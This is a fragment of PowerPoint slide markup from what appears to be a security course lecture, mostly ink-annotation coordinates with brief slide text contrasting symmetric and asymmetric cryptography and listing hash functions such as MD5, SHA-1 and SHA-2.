                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="354633" y="3545032"/>
                <a:ext cx="23400" cy="806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85D2721-1601-2A49-ADFF-3ED29751A37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45993" y="3536392"/>
                  <a:ext cx="410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3466215-0E19-E94B-8838-B3CFAA898B22}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="424113" y="3548992"/>
                <a:ext cx="4320" cy="756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3466215-0E19-E94B-8838-B3CFAA898B2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15113" y="3540352"/>
                  <a:ext cx="219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CAF3B57-0A8F-FF4A-B89D-9B760EEDD337}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="400353" y="3473752"/>
                <a:ext cx="360" cy="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CAF3B57-0A8F-FF4A-B89D-9B760EEDD33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91713" y="34651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465274F-2D04-754D-AA2C-F600B3CB83E7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="449673" y="3493912"/>
                <a:ext cx="155880" cy="1728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465274F-2D04-754D-AA2C-F600B3CB83E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1033" y="3484912"/>
                  <a:ext cx="173520" cy="19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B416F21-CDA6-A94E-85F1-528F79B88D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1808673" y="3176752"/>
            <a:ext cx="775080" cy="622440"/>
            <a:chOff x="1808673" y="3176752"/>
            <a:chExt cx="775080" cy="62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498E1C1-6BA2-9044-9C44-60C27FB59F54}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1808673" y="3399592"/>
                <a:ext cx="191880" cy="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498E1C1-6BA2-9044-9C44-60C27FB59F5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800033" y="3390592"/>
                  <a:ext cx="209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577552A-8264-7541-831B-F91EBAEEFD79}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1850073" y="3489592"/>
                <a:ext cx="206280" cy="3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577552A-8264-7541-831B-F91EBAEEFD7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841073" y="3480592"/>
                  <a:ext cx="223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C00903E-90FB-5F47-ACE9-78F6201EA5D2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2261553" y="3187192"/>
                <a:ext cx="7560" cy="6120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C00903E-90FB-5F47-ACE9-78F6201EA5D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252553" y="3178192"/>
                  <a:ext cx="25200" cy="62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F1451E7-4854-3749-ADAC-68743AB6BFCA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2252193" y="3176752"/>
                <a:ext cx="331560" cy="6022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F1451E7-4854-3749-ADAC-68743AB6BFC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243553" y="3167752"/>
                  <a:ext cx="349200" cy="61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6D8A9EA6-A495-A341-A343-0DB236030368}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2119713" y="3977752"/>
              <a:ext cx="474480" cy="306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6D8A9EA6-A495-A341-A343-0DB23603036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111073" y="3968752"/>
                <a:ext cx="492120" cy="4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BABD110B-C82B-C747-982B-5937C5376258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3220233" y="5488672"/>
            <a:ext cx="946080" cy="461520"/>
            <a:chOff x="3220233" y="5488672"/>
            <a:chExt cx="946080" cy="46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D9461D0-4F29-9340-BA68-CF446CDDC4FA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3220233" y="5488672"/>
                <a:ext cx="310680" cy="3884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D9461D0-4F29-9340-BA68-CF446CDDC4F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211593" y="5480032"/>
                  <a:ext cx="32832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A88E35A-3CEC-3844-B96C-20892843B26D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3552153" y="5648512"/>
                <a:ext cx="226440" cy="2926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A88E35A-3CEC-3844-B96C-20892843B26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543153" y="5639872"/>
                  <a:ext cx="2440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8365F83-7060-854A-AA85-02FD22025789}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3916833" y="5670472"/>
                <a:ext cx="249480" cy="2797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8365F83-7060-854A-AA85-02FD2202578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908193" y="5661832"/>
                  <a:ext cx="267120" cy="29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1BBC4D4-E680-D54E-83E0-DABCE0695860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4698753" y="5552392"/>
            <a:ext cx="645840" cy="591120"/>
            <a:chOff x="4698753" y="5552392"/>
            <a:chExt cx="645840" cy="59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60C4879-9F36-6D4B-A078-92EFB70AF805}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4698753" y="5613232"/>
                <a:ext cx="360" cy="3884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60C4879-9F36-6D4B-A078-92EFB70AF80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689753" y="5604232"/>
                  <a:ext cx="1800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224AA3E-270A-B740-A6BB-B64531CD88D2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4842753" y="5552392"/>
                <a:ext cx="360" cy="4086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224AA3E-270A-B740-A6BB-B64531CD88D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834113" y="5543752"/>
                  <a:ext cx="1800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E42BF15-1C9C-CF42-850B-E58BC3FDF2C9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4698753" y="5861632"/>
                <a:ext cx="119160" cy="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E42BF15-1C9C-CF42-850B-E58BC3FDF2C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690113" y="5852632"/>
                  <a:ext cx="136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B999E74-8E8E-BF4D-90AA-CBB1BBF3825A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4870113" y="5552752"/>
                <a:ext cx="474480" cy="5907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B999E74-8E8E-BF4D-90AA-CBB1BBF3825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861113" y="5544112"/>
                  <a:ext cx="492120" cy="60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1DDFD5C-1501-644D-99F2-F4BF9531AD06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3876153" y="4951552"/>
            <a:ext cx="1112400" cy="361800"/>
            <a:chOff x="3876153" y="4951552"/>
            <a:chExt cx="1112400" cy="36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95E70AD-9068-6446-AC0B-6CE8E782383E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3931233" y="5038672"/>
                <a:ext cx="1057320" cy="111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95E70AD-9068-6446-AC0B-6CE8E782383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922593" y="5030032"/>
                  <a:ext cx="10749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2B49271-472A-2945-98BD-7CF199614182}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3876153" y="4951552"/>
                <a:ext cx="231120" cy="3618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2B49271-472A-2945-98BD-7CF19961418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867153" y="4942552"/>
                  <a:ext cx="248760" cy="37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978841B-F80D-584E-BEE7-5BD5E7E6B4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3884433" y="6204352"/>
            <a:ext cx="2848320" cy="467640"/>
            <a:chOff x="3884433" y="6204352"/>
            <a:chExt cx="2848320" cy="46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2A07B15-68B7-BD45-ACDE-B692872EE23C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3884433" y="6406672"/>
                <a:ext cx="1063800" cy="1126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2A07B15-68B7-BD45-ACDE-B692872EE23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875793" y="6397672"/>
                  <a:ext cx="10814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71B308F-5145-C843-898E-59BB2E6F1DE2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4739793" y="6323872"/>
                <a:ext cx="276840" cy="2160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71B308F-5145-C843-898E-59BB2E6F1DE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730793" y="6314872"/>
                  <a:ext cx="2944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294ECD1-3B99-C14B-8853-1A0F37BD3BAC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5293113" y="6467152"/>
                <a:ext cx="216720" cy="2037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294ECD1-3B99-C14B-8853-1A0F37BD3BA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284113" y="6458152"/>
                  <a:ext cx="2343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328B835-7C92-3445-A39C-BB9B8F3B74C2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5522073" y="6470752"/>
                <a:ext cx="144720" cy="2012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328B835-7C92-3445-A39C-BB9B8F3B74C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513073" y="6462112"/>
                  <a:ext cx="1623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E333559-AE3F-AC48-9FB6-A9089F3FC0A4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5676513" y="6356992"/>
                <a:ext cx="60120" cy="2196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E333559-AE3F-AC48-9FB6-A9089F3FC0A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667513" y="6348352"/>
                  <a:ext cx="777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017B0D8-75FC-9B41-AEC9-919A13F91C4E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5812593" y="6204352"/>
                <a:ext cx="83520" cy="3441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017B0D8-75FC-9B41-AEC9-919A13F91C4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803953" y="6195352"/>
                  <a:ext cx="10116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12FD3E6-1611-0A4B-8799-8FDE7E82CD60}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5774073" y="6412072"/>
                <a:ext cx="144720" cy="406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12FD3E6-1611-0A4B-8799-8FDE7E82CD6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765433" y="6403432"/>
                  <a:ext cx="1623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94B9565-B804-4A46-B622-B8F7ECA7D3B4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6118593" y="6416392"/>
                <a:ext cx="538560" cy="342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94B9565-B804-4A46-B622-B8F7ECA7D3B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109593" y="6407392"/>
                  <a:ext cx="5562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8018E13-E5C5-6A47-886B-2D350958A2AC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6546993" y="6352312"/>
                <a:ext cx="185760" cy="2372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8018E13-E5C5-6A47-886B-2D350958A2A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538353" y="6343672"/>
                  <a:ext cx="203400" cy="25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C1D89F16-56E6-1640-B2B1-804180264BDF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4621713" y="2192872"/>
              <a:ext cx="74880" cy="92844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C1D89F16-56E6-1640-B2B1-804180264BD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613073" y="2184232"/>
                <a:ext cx="92520" cy="94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6580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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Asymmetric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Symmetric crypto is fast and lightweight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric crypto is much slower but doesn’t require a shared key a priori</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally, we use asymmetric crypto only to bootstrap the more efficient symmetric crypto, then use the latter thereafter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087F9F-6EF7-794A-86AE-111454702E0B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="584313" y="3568072"/>
              <a:ext cx="1139760" cy="1523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087F9F-6EF7-794A-86AE-111454702E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5313" y="3559072"/>
                <a:ext cx="1157400" cy="1540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crypto hash function takes any string and produces a fixed-size output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5 produces 128 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SHA-1 produces 160 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SHA-256 produces 256 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SHA-512… etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These functions should be “one way” and “collision resistant”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5 was recently broken, SHA-1 is broken too, NSA gave us SHA-256, SHA-384, SHA-512 (together called “SHA-2”); SHA-3 was selected based on  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RadioGatún</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (ratified by NIST Aug 2015)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not widely deployed yet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rhash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on kali if you want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899B6A-ED0F-CC46-89CA-F4FE2AB00DE1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="789873" y="2952832"/>
              <a:ext cx="360720" cy="699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899B6A-ED0F-CC46-89CA-F4FE2AB00D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1233" y="2943832"/>
                <a:ext cx="378360" cy="71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3DCA1C7-3C08-8B42-84A5-42A66AE610DC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1625073" y="4658512"/>
              <a:ext cx="3593520" cy="89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3DCA1C7-3C08-8B42-84A5-42A66AE610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16433" y="4649512"/>
                <a:ext cx="361116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7DCA43A-FC8D-5E4D-83A8-03F0F62E373A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4547553" y="4382032"/>
              <a:ext cx="692640" cy="4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7DCA43A-FC8D-5E4D-83A8-03F0F62E373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38553" y="4373392"/>
                <a:ext cx="71028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C932F3D-6936-9441-BAC9-CBC62D3FC502}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3045633" y="2610472"/>
              <a:ext cx="92628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C932F3D-6936-9441-BAC9-CBC62D3FC50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36633" y="2601832"/>
                <a:ext cx="94392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314227C0-DD78-E546-81B3-BEAB5F6920F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4584993" y="2037712"/>
            <a:ext cx="2404080" cy="636480"/>
            <a:chOff x="4584993" y="2037712"/>
            <a:chExt cx="2404080" cy="63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78AA213-B961-D74C-87CD-34A83C73CBA8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4584993" y="2292232"/>
                <a:ext cx="419760" cy="3819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78AA213-B961-D74C-87CD-34A83C73CBA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75993" y="2283232"/>
                  <a:ext cx="43740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6467829-D0FC-B14A-A417-1B98CB3378FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5036073" y="2133472"/>
                <a:ext cx="111960" cy="1692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6467829-D0FC-B14A-A417-1B98CB3378F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27073" y="2124832"/>
                  <a:ext cx="1296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AA30D7E-B2F8-E640-AA74-B18806983BC9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5212833" y="2121952"/>
                <a:ext cx="148320" cy="117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AA30D7E-B2F8-E640-AA74-B18806983BC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03833" y="2113312"/>
                  <a:ext cx="1659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9B5EFE3-A3BC-BC45-A2DA-A627C3A799A1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5310033" y="2132392"/>
                <a:ext cx="360" cy="1944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9B5EFE3-A3BC-BC45-A2DA-A627C3A799A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01033" y="2123752"/>
                  <a:ext cx="180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D808F7F-452E-A64B-B774-FDFCAE0BC650}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5460873" y="2445592"/>
                <a:ext cx="100800" cy="36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D808F7F-452E-A64B-B774-FDFCAE0BC6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52233" y="2436952"/>
                  <a:ext cx="1184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18C65CF-FB44-2848-895B-90996AC0DDC3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5423073" y="2431192"/>
                <a:ext cx="82800" cy="136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18C65CF-FB44-2848-895B-90996AC0DDC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14433" y="2422192"/>
                  <a:ext cx="1004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C0AD808-CEB0-644B-8C55-F4201C623031}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5655273" y="2278912"/>
                <a:ext cx="384840" cy="3412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C0AD808-CEB0-644B-8C55-F4201C62303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46633" y="2269912"/>
                  <a:ext cx="40248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3412D4F-70C1-B64E-9C86-F0120AD6F35D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5954793" y="2096752"/>
                <a:ext cx="82800" cy="1285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3412D4F-70C1-B64E-9C86-F0120AD6F3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945793" y="2088112"/>
                  <a:ext cx="1004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6274414-473D-164A-B763-59D3B45B7D70}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6021753" y="2092072"/>
                <a:ext cx="360" cy="216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6274414-473D-164A-B763-59D3B45B7D7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012753" y="2083072"/>
                  <a:ext cx="180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52F5366-F9EC-8B40-8D20-8B5DBBBBB9CC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6217953" y="2333272"/>
                <a:ext cx="100800" cy="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52F5366-F9EC-8B40-8D20-8B5DBBBBB9C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09313" y="2324632"/>
                  <a:ext cx="118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C537C78-267B-DA41-812E-1F03F22D9158}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6217593" y="2432632"/>
                <a:ext cx="64440" cy="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C537C78-267B-DA41-812E-1F03F22D915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08953" y="2423632"/>
                  <a:ext cx="82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D21A5E7-C1BF-CF45-A3C4-0C05B961EF92}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6431433" y="2251552"/>
                <a:ext cx="223200" cy="314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D21A5E7-C1BF-CF45-A3C4-0C05B961EF9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22433" y="2242552"/>
                  <a:ext cx="2408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AF79902-95E7-C34F-8855-9AA70BDCAFAA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6679473" y="2064712"/>
                <a:ext cx="105480" cy="2361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AF79902-95E7-C34F-8855-9AA70BDCAFA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70833" y="2055712"/>
                  <a:ext cx="1231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4A3CD37-80E6-784E-A5DD-FB589A33C16D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6873153" y="2037712"/>
                <a:ext cx="115920" cy="2358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4A3CD37-80E6-784E-A5DD-FB589A33C16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864513" y="2029072"/>
                  <a:ext cx="133560" cy="25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00B0D0-3DF3-C043-966E-BC30FE164765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7524753" y="2079472"/>
            <a:ext cx="587880" cy="560160"/>
            <a:chOff x="7524753" y="2079472"/>
            <a:chExt cx="587880" cy="56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843C25D-3C4C-6745-9E8D-0CF69EEB6881}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7524753" y="2202232"/>
                <a:ext cx="384480" cy="4374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843C25D-3C4C-6745-9E8D-0CF69EEB688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15753" y="2193232"/>
                  <a:ext cx="40212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1C5910A-7020-1F4C-9414-BD9B27AF5040}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7805193" y="2080192"/>
                <a:ext cx="112680" cy="1288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1C5910A-7020-1F4C-9414-BD9B27AF504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796553" y="2071552"/>
                  <a:ext cx="1303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8E4B682-1017-7342-AFC9-AA00CA62B3BF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7997433" y="2106112"/>
                <a:ext cx="115200" cy="1461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8E4B682-1017-7342-AFC9-AA00CA62B3B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88793" y="2097472"/>
                  <a:ext cx="1328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A8CD415-B3DB-1848-9217-01D5AD099238}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7807713" y="2079472"/>
                <a:ext cx="360" cy="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A8CD415-B3DB-1848-9217-01D5AD09923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799073" y="207083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AC03E20-CAC9-1F47-A99E-EFB453D7A5BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5486793" y="2792272"/>
            <a:ext cx="2217600" cy="687600"/>
            <a:chOff x="5486793" y="2792272"/>
            <a:chExt cx="2217600" cy="68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85CA3B4-6E2F-6542-8082-7F8C277BD4FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5486793" y="3038872"/>
                <a:ext cx="8280" cy="3319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85CA3B4-6E2F-6542-8082-7F8C277BD4F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77793" y="3030232"/>
                  <a:ext cx="259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19AB378-8A34-4A45-A591-0DD7146E3042}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5789913" y="2967232"/>
                <a:ext cx="4320" cy="2890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19AB378-8A34-4A45-A591-0DD7146E304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81273" y="2958232"/>
                  <a:ext cx="219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F1A8A10-06DC-D540-8243-F7251B817286}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5697753" y="2872192"/>
                <a:ext cx="365400" cy="1868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F1A8A10-06DC-D540-8243-F7251B81728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689113" y="2863552"/>
                  <a:ext cx="3830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5883BFD-0AD5-8B4A-B8C9-46CB67D95E25}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6062793" y="3008632"/>
                <a:ext cx="7920" cy="2678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5883BFD-0AD5-8B4A-B8C9-46CB67D95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053793" y="2999632"/>
                  <a:ext cx="255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A66BB22-BAE7-BC49-9E19-B06B772775C5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6027513" y="2946352"/>
                <a:ext cx="280440" cy="3607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A66BB22-BAE7-BC49-9E19-B06B772775C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018873" y="2937352"/>
                  <a:ext cx="29808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C3C88AF-AE34-984E-B96D-D9BB1CB0ED18}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6510993" y="3014032"/>
                <a:ext cx="88200" cy="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C3C88AF-AE34-984E-B96D-D9BB1CB0ED1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501993" y="3005392"/>
                  <a:ext cx="105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FCA30A5-014E-B743-B284-CF95507F282E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6534753" y="3164872"/>
                <a:ext cx="101160" cy="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FCA30A5-014E-B743-B284-CF95507F282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525753" y="3156232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C085E11-E6CE-FE4D-88F5-2CB28407297E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
